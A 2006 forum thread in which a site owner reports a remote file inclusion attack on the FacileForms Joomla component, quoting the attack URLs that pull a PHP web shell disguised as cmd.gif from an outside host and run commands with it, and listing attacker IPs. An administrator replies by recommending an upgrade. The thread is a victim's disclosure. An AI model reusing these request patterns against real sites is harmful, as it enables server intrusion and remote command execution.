July 30, 2010, 09:49:43 am *
Welcome, Guest. Please login or register.

Login with username, password and session length
News: Common questions answered here !
 
   Home   Help Search Login Register  
Pages: [1]   Go Down
  Print  
Author Topic: Hackling attempt granted  (Read 3514 times)
Makis77
Supporter
Newbie
*****
Offline Offline

Posts: 22


« on: September 10, 2006, 09:01:02 pm »

I was hit by a remote query,
it was run by www.myspace.si

and the file was called cmd.gif

so the query was at www.myspace.si/cmd.gif
of course the cmd.gif was actually a php file like with a false extension.
Below i m putting the query and i attach the file (the correct extension is .php) that
someone tried to launch.
 He entered my place with this query

http://www.mysite.com/component/option,com_facileforms/Itemid,96/components/com_facileforms/facileforms.frame.php?ff_compath=http://myspace.si/images

then he executed this

http://www.mysite.com/index.php?option=com_facileforms&Itemid=96http://www.myspace.si/images/cmd.gif?&action=cmd&chdir=/home/kite/public_html/

and left from the same

http://www.mysite.com/index.php?option=com_facileforms&Itemid=96http://www.myspace.si/images/cmd.gif?&action=cmd&chdir=/home/kite/public_html/

As far as i searched i didnt find any mulfunctions.

I think the creator must check this out Wink

(just rename cmd.gif to cmf.php)


PS: i was attacked by the following ip's and countries

- Toscana, Arezzo, Italy ip-44-61.sn2.eutelia.it (83.211.44.61)
- Minas Gerais, Belo Horizonte, Brazil (201.50.144.64)
- Brazil aowen.persistelecom.com.br (200.189.60.253)
- Pernambuco, Recife, Brazil dial-up-200-157-27-28.intelignet.com.br (200.157.27.28)
- Noord-holland, Amsterdam, Netherlands (62.162.241.28)

* cmd.gif (21.71 KB - downloaded 281 times.)
Logged
facile
Administrator
Hero Member
*****
Offline Offline

Posts: 774



« Reply #1 on: September 10, 2006, 09:35:14 pm »

From the file that is called it seems you are running an outdated version of FacileForms. I suggest to upgrade to the latest release available in our download section to be on the safe side.
Logged

Peter
Makis77
Supporter
Newbie
*****
Offline Offline

Posts: 22


« Reply #2 on: September 10, 2006, 11:44:28 pm »

How can i tell my version?
From frontend and under configuration i see i have 1.46
How can i tell if that is g version?

The malicious queries apparently didnt do anything to me.
Logged
Pages: [1]   Go Up
  Print  
 
Jump to:  

Powered by SMF © 2001-2006 Lewis Media
| Terms of Use | Privacy | Sitemap |